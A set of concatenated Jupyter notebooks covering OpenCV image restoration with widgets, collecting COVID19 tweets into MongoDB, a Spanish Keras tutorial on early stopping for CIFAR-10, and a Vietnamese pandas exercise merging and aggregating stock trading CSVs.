fig, axes = plt.subplots(ncols = 2, figsize = (15,5))
axes[0].imshow(img)
axes[0].axis('off')
axes[0].set_title(Selection)
axes[1].imshow(sample)
axes[1].axis('off')
axes[1].set_title('Auto-Colored')
def img_restoration(img):
"""
Summary -
This function is created to carry out image restoration process in steps
:param img: Image that needs to be restored
:type img: Imageio class array
:return: list of images and labels
:rtype: String and imageio array list
"""
#perform denoising of the image
denoised = cv.fastNlMeansDenoisingColored(img,None,7,10,6,21)
#canny edge detection
edges = cv.Canny(denoised,200,250)
#filter for image processing
kernel = np.ones((5,5),np.uint8)
#image dilation
dilation = cv.morphologyEx(edges, cv.MORPH_DILATE, kernel)
closing = cv.morphologyEx(dilation, cv.MORPH_CLOSE, kernel)
erode = cv.morphologyEx(closing,cv.MORPH_ERODE, kernel)
#fill in missing gaps
inpainted = cv.inpaint(denoised,erode,5,cv.INPAINT_TELEA)
#overlay denoised image over smoothed out image
alpha = 0.5
overlaid = inpainted.copy()
cv.addWeighted(denoised, alpha, overlaid, 1 - alpha,0, overlaid)
#convert image to gray
img2gray = cv.cvtColor(denoised,cv.COLOR_BGR2GRAY)
#create mask and inverse mask based on threshold
ret, mask = cv.threshold(img2gray, 100, 255, cv.THRESH_BINARY_INV)
#combine via bit addition denoised image human and smoothed out background of inpainted image
bg1 = cv.bitwise_and(denoised,denoised,mask = mask)
mask_inv = cv.bitwise_not(mask)
bg2 = cv.bitwise_and(overlaid,overlaid,mask = mask_inv)
combined = cv.add(bg1,bg2)
#store the various processed images
images = [img,denoised,inpainted,overlaid,combined]
labels = ['Original','Choice 1','Choice 2', 'Choice 3', 'Choice 4']
return images, labels
def display_images(images,labels):
"""
Summary -
This function displays the various processed images and labels associated with them
:param images: list of processed images
:type images: list
:param labels: list of labels
:type labels: list
"""
fig, axes = plt.subplots(ncols = 5, figsize = (15,5))
axes[0].imshow(images[0])
axes[0].axis('off')
axes[0].set_title(labels[0])
axes[1].imshow(images[1])
axes[1].axis('off')
axes[1].set_title(labels[1])
axes[2].imshow(images[2])
axes[2].axis('off')
axes[2].set_title(labels[2])
axes[3].imshow(images[3])
axes[3].axis('off')
axes[3].set_title(labels[3])
axes[4].imshow(images[4])
axes[4].axis('off')
axes[4].set_title(labels[4])
!jupyter nbextension enable --py widgetsnbextension
import ipywidgets as widgets
from IPython.display import display, clear_output
from ipywidgets import interact, interact_manual, fixed, Output
#create button for widget
button = widgets.Button(description="Begin Restoration")
save = widgets.Button(description="Save Result")
#create text box for widget
filename = widgets.Text(value='<filename>.jpg',placeholder='Type something',disabled=False)
#create output area for widget
output = widgets.Output()
#layout setting piece for code
vertical = widgets.VBox([widgets.Label(value="Enter the name of the picture you want to restore:"),widgets.HBox([filename, button])])
display(vertical)
display(output)
def on_button_clicked(b):
"""
Summary -
This function handles the button clicked event
:param b: passes a reference to the button itself
:type b: Widgets Button
"""
with output:
clear_output()
#read the image
img = io.imread("images/"+filename.value)
#gets 4 different kinds of processed images
images, labels = img_restoration(img)
#displays the various options
display_images(images,labels)
display(widgets.Label(value="Select the picture you want to color:"))
#code that calls the model based on user selected image
interact(show_image, Selection = labels, l=fixed(labels), i=fixed(images), description = 'Choose image to color')
display(widgets.Label(value="Output saved to the output folder"))
button.on_click(on_button_clicked)
###Output
_____no_output_____
###Markdown
Collect Tweets into MongoDB Install Python librariesYou may need to restart your Jupyter Notebook instance after installed those libraries.
###Code
!pip install pymongo
!pip install pymongo[srv]
!pip install dnspython
!pip install tweepy
!pip install twitter
###Output
Requirement already satisfied: twitter in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (1.18.0)
[33mWARNING: You are using pip version 20.0.2; however, version 20.3.1 is available.
You should consider upgrading via the '/home/ec2-user/anaconda3/envs/python3/bin/python -m pip install --upgrade pip' command.[0m
###Markdown
Import Python libraries
###Code
import pymongo
from pymongo import MongoClient
import json
import tweepy
import twitter
from pprint import pprint
import configparser
import pandas as pd
###Output
_____no_output_____
###Markdown
Load the Authorization Info Save database connection info and API Keys in a config.ini file and use the configparse to load the authorization info.
###Code
config = configparser.ConfigParser()
config.read('config.ini')
CONSUMER_KEY = config['mytwitter']['api_key']
CONSUMER_SECRET = config['mytwitter']['api_secrete']
OAUTH_TOKEN = config['mytwitter']['access_token']
OATH_TOKEN_SECRET = config['mytwitter']['access_secrete']
mongod_connect = config['mymongo']['connection']
###Output
_____no_output_____
###Markdown
Connect to the MongoDB Cluster
###Code
client = MongoClient(mongod_connect)
db = client.gp31 # use or create a database named demo
final_project = db.final_project #use or create a collection named tweet_collection
final_project.create_index([("id", pymongo.ASCENDING)],unique = True) # make sure the collected tweets are unique
###Output
_____no_output_____
###Markdown
Use the REST API to Collect Tweets Authorize the REST API
###Code
rest_auth = twitter.oauth.OAuth(OAUTH_TOKEN,OATH_TOKEN_SECRET,CONSUMER_KEY,CONSUMER_SECRET)
rest_api = twitter.Twitter(auth=rest_auth)
###Output
_____no_output_____
###Markdown
Define the query for the REST API
###Code
count = 100
geocode = "47.650589,-100.437012,150mi"
q = "COVID19"
###Output
_____no_output_____
###Markdown
The collected tweets will contain 'election' AND are located in Harrisonburg, VA
###Code
search_results = rest_api.search.tweets(count=count, q=q, geocode=geocode) #you can use both q and geocode
statuses = search_results["statuses"]
since_id_new = statuses[-1]['id']
for statuse in statuses:
try:
final_project.insert_one(statuse)
pprint(statuse['created_at'])
except:
pass
###Output
'Thu Dec 10 20:22:05 +0000 2020'
'Thu Dec 10 20:20:18 +0000 2020'
'Thu Dec 10 20:19:01 +0000 2020'
'Thu Dec 10 20:16:21 +0000 2020'
'Thu Dec 10 20:16:03 +0000 2020'
'Thu Dec 10 20:11:54 +0000 2020'
'Thu Dec 10 20:06:40 +0000 2020'
'Thu Dec 10 20:01:18 +0000 2020'
'Thu Dec 10 19:57:30 +0000 2020'
'Thu Dec 10 19:56:43 +0000 2020'
'Thu Dec 10 19:56:40 +0000 2020'
'Thu Dec 10 19:56:34 +0000 2020'
'Thu Dec 10 19:52:35 +0000 2020'
'Thu Dec 10 19:51:33 +0000 2020'
'Thu Dec 10 19:48:55 +0000 2020'
'Thu Dec 10 19:46:54 +0000 2020'
###Markdown
Continue fetching early tweets with the same query. YOU WILL REACH YOUR RATE LIMIT VERY FAST
###Code
since_id_old = 0
while(since_id_new != since_id_old):
since_id_old = since_id_new
search_results = rest_api.search.tweets( count=count,q=q,
geocode=geocode, max_id= since_id_new)
statuses = search_results["statuses"]
since_id_new = statuses[-1]['id']
for statuse in statuses:
try:
final_project.insert_one(statuse)
pprint(statuse['created_at']) # print the date of the collected tweets
except:
pass
###Output
_____no_output_____
###Markdown
View the Collected Tweets Print the number of tweets and unique twitter users
###Code
print(final_project.estimated_document_count())# number of tweets collected
user_cursor = final_project.distinct("user.id")
print (len(user_cursor)) # number of unique Twitter users
###Output
2812
1771
###Markdown
Create a text index and print the Tweets containing specific keywords.
###Code
final_project.create_index([("text", pymongo.TEXT)], name='text_index', default_language='english') # create a text index
###Output
_____no_output_____
###Markdown
Create a cursor to query tweets with the created index
###Code
tweet_cursor = tweet_collection.find({"$text": {"$search": "vote"}}) # return tweets contain vote
###Output
_____no_output_____
###Markdown
Use pprint to display tweets
###Code
for document in tweet_cursor[0:10]: # display the first 10 tweets from the query
try:
print ('----')
# pprint (document) # use pprint to print the entire tweet document
print ('name:', document["user"]["name"]) # user name
print ('text:', document["text"]) # tweets
except:
print ("***error in encoding")
pass
tweet_cursor = final_project.find({"$text": {"$search": "vote"}}) # return tweets contain vote
###Output
_____no_output_____
###Markdown
Use pandas to display tweets
###Code
tweet_df = pd.DataFrame(list(tweet_cursor ))
tweet_df[:10] #display the first 10 tweets
tweet_df["favorite_count"].hist() # create a histogram show the favorite count
###Output
_____no_output_____ |
04-early-stopping.ipynb | ###Markdown
Entrenamiento automático (Early Stopping)La técnica de _Early Stopping_ es de suma importancia para el entrenamiento de redes neuronales. Consiste en monitorear una métrica o valor correspondiente que está siendo evaluado por el modelo en cuestión, tal que cuando este valor empeore el entrenamiento se detenga automáticamente.Es una técnica de suma importancia para evitar los problemas de sobreajuste en redes neuronales, esto se logra cuando se genera un conocimiento de lo que está sucediendo en el entrenamiento de las redes neuronales.En este documento se verá un ejemplo aplicado a una CNN que clasifica el conjunto de datos CIFAR-10, con algunas de las técnicas conocidas como _Batch Normalization_ y _Early Stopping_ para ver su efecto.
###Code
from keras.datasets import cifar10
from keras.models import Sequential, load_model
from keras.layers import Dense, BatchNormalization, Activation
from keras.layers import Conv2D, MaxPooling2D, Flatten
from keras.utils import to_categorical
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.optimizers import Nadam
import matplotlib.pyplot as plt
###Output
_____no_output_____
###Markdown
Como siempre, se inicializan los hiperparámetros necesarios para el modelo, en este caso se emplean 100 épocas, pero no se asegura que se utilicen todas.
###Code
batch_size = 32
num_classes = 10
epocas = 100
###Output
_____no_output_____
###Markdown
Preprocesamiento de datosComo se acostumbra a hacer, se cargan los datos, se hace una exploración general del conjunto y se codifican las clases utilizando _One Hot_ para poder emplear la función de pérdida usual que es la entropía cruzada.
###Code
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
print("Tamaño de x_train:", x_train.shape)
print(x_train.shape[0], "Ejemplos de entrenamiento")
print(x_test.shape[0], "Ejemplos de prueba")
plt.imshow(x_train[10, :, :, :])
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
# Siempre se deben normalizar los datos
x_train /= 255
x_test /= 255
# Codificar a One Hot cada clase del conjunto de datos
y_train = to_categorical(y_train, num_classes)
y_test = to_categorical(y_test, num_classes)
###Output
_____no_output_____
###Markdown
Arquitectura de la CNNEn este caso se va a aplicar la siguiente arquitectura:- La **primera** capa es de convolución con 32 unidades, con relleno de $3 \times 3$, y función de activación ReLU.- La **segunda** capa también es de convolución con 32 unidades, sin relleno, y función de activación ReLU.- A estas dos capas le sigue una capa de _max pooling_ de $2 \times 2$.- La **tercera** capa es de convolución con 64 unidades, con relleno de $3 \times 3$, y función de activación ReLU.- La **cuarta** capa también es de convolución con 64 unidades, sin relleno, y función de activación ReLU.- A estas dos capas le sigue una nueva capa de _max pooling_ de $2 \times 2$; aquí termina la etapa de características- Con la etapa de clasificación se **aplanan** las imágenes y se ingresan a una red neuronal totalmente conectada de 512 unidades con función de activación ReLU.- La **capa de salida** tiene tantas unidades como clases y función de activación softmax.Entre cada capa se aplica _batch normalization_ y se quita el uso de sesgos para acelerar el entrenamiento.
###Code
# Todas las capas normalizadas, excpeto la última
arquitectura_norm = [
# Capa de entrada, primera capa de características
Conv2D(32, kernel_size=(3, 3),
padding="same",
input_shape=x_train.shape[1:],
use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
Conv2D(32, (3, 3), use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
MaxPooling2D(pool_size=(2, 2)),
# Segunda capa de características
Conv2D(64, kernel_size=(3, 3),
padding="same",
use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
Conv2D(64, (3, 3), use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
MaxPooling2D(pool_size=(2, 2)),
# Capa totalmente conectada
Flatten(),
Dense(512, use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
# Capa de salida
Dense(num_classes, activation="softmax")
]
# Se construye el modelo con esta arquitectura
model_normalizado = Sequential(arquitectura_norm)
###Output
_____no_output_____
###Markdown
Optimizador y entrenamientoPara el optimizador se emplea _Nadam_ con los [valores default](https://keras.io/optimizers/) de `keras`.
###Code
model_normalizado.compile(loss="categorical_crossentropy",
optimizer=Nadam(),
metrics=["accuracy"])
###Output
_____no_output_____
###Markdown
Llamadas al modeloAhora se va a implementar _Early stopping_ como una llamada al modelo. Afortunadamente `keras` ya cuenta con una implementación de esta metodología. En este caso se monitereará la **pérdida del conjunto de validación**, y se estará observando su cambio a lo largo de 5 épocas.Adicionalmente se va a implementar el guardado del mejor modelo cada que se evalua. A este se le conoce como _Model checkpoint_ en `keras`, lo que permite guardar el modelo que tenga el mejor valor monitoreado. En este caso se va a monitorear la **precisión en el conjunto de validación** y solamente se guardará el mejor modelo encontrado.
###Code
# Aplicar Early Stopping
es = EarlyStopping(monitor="val_loss", mode="min", verbose=1, patience=5)
# Guardar siempre el mejor modelo encontrado en base a la precisión de validación
mc = ModelCheckpoint("mejor_modelo.h5", monitor="val_acc", mode="max", verbose=1, save_best_only=True)
# Se procede a entrenar el modelo
historia = model_normalizado.fit(x_train, y_train,
validation_split=0.2,
epochs=epocas,
verbose=1,
callbacks=[es, mc])
###Output
Train on 40000 samples, validate on 10000 samples
Epoch 1/100
40000/40000 [==============================] - 126s 3ms/step - loss: 1.1688 - acc: 0.5898 - val_loss: 1.1700 - val_acc: 0.6021
Epoch 00001: val_acc improved from -inf to 0.60210, saving model to mejor_modelo.h5
Epoch 2/100
40000/40000 [==============================] - 120s 3ms/step - loss: 0.7645 - acc: 0.7328 - val_loss: 1.0196 - val_acc: 0.6518
Epoch 00002: val_acc improved from 0.60210 to 0.65180, saving model to mejor_modelo.h5
Epoch 3/100
40000/40000 [==============================] - 124s 3ms/step - loss: 0.5962 - acc: 0.7924 - val_loss: 0.7436 - val_acc: 0.7483
Epoch 00003: val_acc improved from 0.65180 to 0.74830, saving model to mejor_modelo.h5
Epoch 4/100
40000/40000 [==============================] - 125s 3ms/step - loss: 0.4569 - acc: 0.8398 - val_loss: 0.8535 - val_acc: 0.7280
Epoch 00004: val_acc did not improve from 0.74830
Epoch 5/100
40000/40000 [==============================] - 126s 3ms/step - loss: 0.3435 - acc: 0.8795 - val_loss: 0.8401 - val_acc: 0.7474
Epoch 00005: val_acc did not improve from 0.74830
Epoch 6/100
40000/40000 [==============================] - 121s 3ms/step - loss: 0.2414 - acc: 0.9166 - val_loss: 0.9202 - val_acc: 0.7379
Epoch 00006: val_acc did not improve from 0.74830
Epoch 7/100
40000/40000 [==============================] - 127s 3ms/step - loss: 0.1821 - acc: 0.9371 - val_loss: 0.9331 - val_acc: 0.7487
Epoch 00007: val_acc improved from 0.74830 to 0.74870, saving model to mejor_modelo.h5
Epoch 8/100
40000/40000 [==============================] - 128s 3ms/step - loss: 0.1359 - acc: 0.9536 - val_loss: 0.9541 - val_acc: 0.7612
Epoch 00008: val_acc improved from 0.74870 to 0.76120, saving model to mejor_modelo.h5
Epoch 00008: early stopping
###Markdown
Como se puede ver, el modelo dejó de entrenar abruptamente. Esto se debe a que el valor de pérdida de la última época de entrenamiento empezó a aumentar. Vamos a analizar esto con más detalle.En la época 7 el **valor de la pérdida en el conjunto de validación** fue de 0.9331, mientras que en el época 8 fue de 09541. Al ver que este valor aumentó se activa el _Early stopping_ deteniendo por completo el entrenamiento.Se debe notar que el monitoreo es cada 5 épocas. Con este se puede ver el siguiente gráfica para analizar visualmente el entrenamiento.
###Code
# Graficar los valores de pérdida en el entrenamiento
plt.figure(figsize=(13, 9))
plt.plot(historia.history['loss'])
plt.plot(historia.history['val_loss'])
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()
###Output
_____no_output_____
###Markdown
Claramente se presenta sobreajuste, pero más importante que eso, el valor de la pérdida el conjunto de entrenamiento y el conjunto de validación están muy dispersos.Este es el propósito de _Early stopping._ Cuando no existe una mejora sustancial en la clasificación del conjunto de validación es mejor detener el entrenamiento y afinar los hiperparámetros necesarios para mejorar el rendimiento del modelo.
###Code
# Cargar el mejor modelo encontrado
mejor_modelo = load_model("mejor_modelo.h5")
###Output
_____no_output_____
###Markdown
Con esto se carga el mejor modelo encontrado en el proceso de entrenamiento, que fue guardado mientras se evaluaba cada época. La ventaja de _Early stopping_ es que siempre se puede tener un modelo guardado y emplearlo para tener el conjunto de datos de prueba al respecto.En el siguiente pedazo de código se hace justamente esto. Se cargó el modelo guardado y ahora se evalúa con un conjunto de datos que nunca fue visto por el modelo.
###Code
resultado = mejor_modelo.evaluate(x_test, y_test)
print(f"Pérdida: {resultado[0]}\nPrecisión: {resultado[1]}")
###Output
10000/10000 [==============================] - 10s 960us/step
Pérdida: 0.9576307853221894
Precisión: 0.7606
|
Chapter5_Exercise2_Stock_Trading.ipynb | ###Markdown
Chapter 5 - Exercise 2: Giao dịch chứng khoán Cho 3 file .csv sau:* **stocks1.csv :** *date*, *symbol*, *open*, *high*, *low*, *close*, *volume* : chứa thông tin giao dịch chứng khoán các công ty khác nhau* **stocks2.csv :** *date*, *symbol*, *open*, *high*, *low*, *close*, *volume* : chứa thông tin giao dịch chứng khoán các công ty khác nhau* **companies.csv :** *name*, *employees*, *headquarters_city*, *headquarters_state* : chứa thông tin về trụ sở và số lượng nhân viên cho một công ty cụ thể Thực hiện các yêu cầu sau, và đối chiếu với kết quả cho trước:
###Code
import pandas as pd
import numpy as np
# Câu 1a: Đọc file stocks1.csv => đưa dữ liệu vào stocks1
stocks1 = pd.read_csv('stock_trading_data/stocks1.csv')
# Hiển thị 5 dòng dữ liệu đầu của stocks1
stocks1.head(5)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 3 06-03-19 AMZN 1695.97 NaN NaN 1668.95 3996001 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017
###Code
# Hiển thị 5 dòng dữ liệu cuối của stocks1
stocks1.tail(5)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 10 01-03-19 GOOG 1124.90 1142.97 1124.75 1140.99 1450316 11 04-03-19 GOOG 1146.99 1158.28 1130.69 1147.80 1446047 12 05-03-19 GOOG 1150.06 NaN NaN 1162.03 1443174 13 06-03-19 GOOG 1162.49 1167.57 1155.49 1157.86 1099289 14 07-03-19 GOOG 1155.72 1156.76 1134.91 1143.30 1166559
###Code
# Cho biết kiểu dữ liệu (dtype) của các cột của stocks1
print(stocks1.dtypes)
###Output
date object
symbol object
open float64
high float64
low float64
close float64
volume int64
dtype: object
###Markdown
Nhấn vào đây để xem kết quả! date objectsymbol objectopen float64high float64low float64close float64volume int64dtype: object
###Code
# Xem thông tin (info) của stocks1
print(stocks1.info())
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 15 entries, 0 to 14
Data columns (total 7 columns):
date 15 non-null object
symbol 15 non-null object
open 15 non-null float64
high 13 non-null float64
low 13 non-null float64
close 15 non-null float64
volume 15 non-null int64
dtypes: float64(4), int64(1), object(2)
memory usage: 920.0+ bytes
None
###Markdown
Nhấn vào đây để xem kết quả! <class 'pandas.core.frame.DataFrame'>RangeIndex: 15 entries, 0 to 14Data columns (total 7 columns):date 15 non-null objectsymbol 15 non-null objectopen 15 non-null float64high 13 non-null float64low 13 non-null float64close 15 non-null float64volume 15 non-null int64dtypes: float64(4), int64(1), object(2)memory usage: 968.0+ bytes
###Code
# Câu 1b: Đọc file stocks2.csv => đưa dữ liệu vào stocks2
stocks2 = pd.read_csv('stock_trading_data/stocks2.csv')
# Hiển thị 5 dòng dữ liệu đầu của stocks2
stocks2.head(5)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 0 01-03-19 FB 162.60 163.132 161.69 162.28 11097770 1 04-03-19 FB 163.90 167.500 163.83 167.37 18894689 2 05-03-19 FB 167.37 171.880 166.55 171.26 28187890 3 06-03-19 FB 172.90 173.570 171.27 172.51 21531723 4 07-03-19 FB 171.50 171.740 167.61 169.13 18306504
###Code
# Hiển thị 5 dòng dữ liệu cuối của stocks2
stocks2.tail(5)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 5 01-03-19 TSLA 306.94 307.1300 291.90 294.79 22911375 6 04-03-19 TSLA 298.12 299.0000 282.78 285.36 17096818 7 05-03-19 TSLA 282.00 284.0000 270.10 276.54 18764740 8 06-03-19 TSLA 276.48 281.5058 274.39 276.24 10335485 9 07-03-19 TSLA 278.84 284.7000 274.25 276.59 9442483
###Code
# Cho biết kiểu dữ liệu (dtype) của các cột của stocks2
print(stocks2.dtypes)
###Output
date object
symbol object
open float64
high float64
low float64
close float64
volume int64
dtype: object
###Markdown
Nhấn vào đây để xem kết quả! date objectsymbol objectopen float64high float64low float64close float64volume int64dtype: object
###Code
# Xem thông tin (info) của stocks2
print(stocks2.info())
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 10 entries, 0 to 9
Data columns (total 7 columns):
date 10 non-null object
symbol 10 non-null object
open 10 non-null float64
high 10 non-null float64
low 10 non-null float64
close 10 non-null float64
volume 10 non-null int64
dtypes: float64(4), int64(1), object(2)
memory usage: 640.0+ bytes
None
###Markdown
Nhấn vào đây để xem kết quả! <class 'pandas.core.frame.DataFrame'>RangeIndex: 10 entries, 0 to 9Data columns (total 7 columns):date 10 non-null objectsymbol 10 non-null objectopen 10 non-null float64high 10 non-null float64low 10 non-null float64close 10 non-null float64volume 10 non-null int64dtypes: float64(4), int64(1), object(2)memory usage: 688.0+ bytes
###Code
# Câu 1c: Đọc file companies.csv => đưa dữ liệu vào companies
companies = pd.read_csv('stock_trading_data/companies.csv')
# Xem dữ liệu của companies
companies
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } name employees headquarters_city headquarters_state 0 AMZN 613300 Seattle WA 1 GOOG 98771 Mountain View CA 2 AAPL 132000 Cupertino CA 3 FB 48268 Menlo Park CA 4 TSLA 48016 Palo Alto CA
###Code
# Cho biết kiểu dữ liệu (dtype) của các cột của companies
print(companies.dtypes)
###Output
name object
employees int64
headquarters_city object
headquarters_state object
dtype: object
###Markdown
Nhấn vào đây để xem kết quả! name objectemployees int64headquarters_city objectheadquarters_state objectdtype: object
###Code
# Xem thông tin (info) của companies
print(companies.info())
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Data columns (total 4 columns):
name 5 non-null object
employees 5 non-null int64
headquarters_city 5 non-null object
headquarters_state 5 non-null object
dtypes: int64(1), object(3)
memory usage: 240.0+ bytes
None
###Markdown
Nhấn vào đây để xem kết quả! <class 'pandas.core.frame.DataFrame'>RangeIndex: 5 entries, 0 to 4Data columns (total 4 columns):name 5 non-null objectemployees 5 non-null int64headquarters_city 5 non-null objectheadquarters_state 5 non-null objectdtypes: int64(1), object(3)memory usage: 288.0+ bytes
###Code
# Câu 2: Cho biết trong stocks1 có dữ liệu Null hay không?
stocks1.isnull().any()
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! date Falsesymbol Falseopen Falsehigh Truelow Trueclose Falsevolume Falsedtype: bool
###Code
# Nếu có, hãy thay thế với quy tắc sau:
# Nếu Null cột 'high' thì thay bằng giá trị max trên cột 'high' của mã chứng khoán đó
stocks1.high.fillna(stocks1.high.max(), inplace=True)
# Nếu Null cột 'low' thì thay bằng giá trị min trên cột 'low' của mã chứng khoán đó
stocks1.low.fillna(stocks1.low.min(), inplace=True)
stocks1
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 3 06-03-19 AMZN 1695.97 1709.43 1620.51 1668.95 3996001 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017 5 01-03-19 AAPL 174.28 175.15 172.89 174.97 25886167 6 04-03-19 AAPL 175.69 177.75 173.97 175.85 27436203 7 05-03-19 AAPL 175.94 176.00 174.54 175.53 19737419 8 06-03-19 AAPL 174.67 175.49 173.94 174.52 20810384 9 07-03-19 AAPL 173.87 174.44 172.02 172.50 24796374 10 01-03-19 GOOG 1124.90 1142.97 1124.75 1140.99 1450316 11 04-03-19 GOOG 1146.99 1158.28 1130.69 1147.80 1446047 12 05-03-19 GOOG 1150.06 1167.57 1124.75 1162.03 1443174 13 06-03-19 GOOG 1162.49 1167.57 1155.49 1157.86 1099289 14 07-03-19 GOOG 1155.72 1156.76 1134.91 1143.30 1166559
###Code
# Câu 3: Tạo dataframe stocks bằng cách gộp stocks1 và stocks2 theo dòng
# stocks = pd.merge(stocks1, stocks2, how='inner')
stocks = pd.merge(left=stocks1, right=stocks2, how='outer')
# Xem 15 dòng dữ liệu cuối của stocks
stocks.tail(15)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 10 01-03-19 GOOG 1124.90 1142.9700 1124.75 1140.99 1450316 11 04-03-19 GOOG 1146.99 1158.2800 1130.69 1147.80 1446047 12 05-03-19 GOOG 1150.06 1167.5700 1124.75 1162.03 1443174 13 06-03-19 GOOG 1162.49 1167.5700 1155.49 1157.86 1099289 14 07-03-19 GOOG 1155.72 1156.7600 1134.91 1143.30 1166559 15 01-03-19 FB 162.60 163.1320 161.69 162.28 11097770 16 04-03-19 FB 163.90 167.5000 163.83 167.37 18894689 17 05-03-19 FB 167.37 171.8800 166.55 171.26 28187890 18 06-03-19 FB 172.90 173.5700 171.27 172.51 21531723 19 07-03-19 FB 171.50 171.7400 167.61 169.13 18306504 20 01-03-19 TSLA 306.94 307.1300 291.90 294.79 22911375 21 04-03-19 TSLA 298.12 299.0000 282.78 285.36 17096818 22 05-03-19 TSLA 282.00 284.0000 270.10 276.54 18764740 23 06-03-19 TSLA 276.48 281.5058 274.39 276.24 10335485 24 07-03-19 TSLA 278.84 284.7000 274.25 276.59 9442483
###Code
# Câu 4: Tạo dataframe stocks_companies bằng cách gộp stocks và companies
stock_companies = pd.merge(stocks, companies, left_on='symbol', right_on='name')
# Xem 5 dòng dữ liệu đầu của stocks_companies
stock_companies.head(5)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume name employees headquarters_city headquarters_state 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 AMZN 613300 Seattle WA 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 AMZN 613300 Seattle WA 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 AMZN 613300 Seattle WA 3 06-03-19 AMZN 1695.97 1709.43 1620.51 1668.95 3996001 AMZN 613300 Seattle WA 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017 AMZN 613300 Seattle WA
###Code
# Câu 5: Cho biết giá (open, high, low, close) trung bình và volume trung bình của mỗi công ty
stock_companies.groupby('symbol').agg(['mean'])
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } open high low close volume symbol AAPL 174.890 175.76600 173.472 174.674 23733309.4 AMZN 1681.284 1694.13400 1651.078 1671.046 4755355.0 FB 167.654 169.56440 166.190 168.510 19603715.2 GOOG 1148.032 1158.63000 1134.118 1150.396 1321077.0 TSLA 288.476 291.26716 278.684 281.904 15710180.2
###Code
# Câu 6: Cho biết giá đóng cửa (close) trung bình, lớn nhất và nhỏ nhất ở mỗi công ty
stock_companies.groupby('symbol').close.agg(['mean', 'max', 'min'])
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } mean min max symbol AAPL 174.674 172.50 175.85 AMZN 1671.046 1625.95 1696.17 FB 168.510 162.28 172.51 GOOG 1150.396 1140.99 1162.03 TSLA 281.904 276.24 294.79
###Code
# Câu 7: Tạo cột parsed_time trong stocks_companies bằng cách đổi thời gian sang định dạng DateTime
stock_companies['parsed_time'] = pd.to_datetime(stock_companies['date'])
# Cho biết kiểu dữ liệu của cột parsed_time
print(stock_companies.parsed_time.dtype)
# Hiển thị 5 dòng dữ liệu đầu của stocks_companies
stock_companies.head(5)
###Output
datetime64[ns]
###Markdown
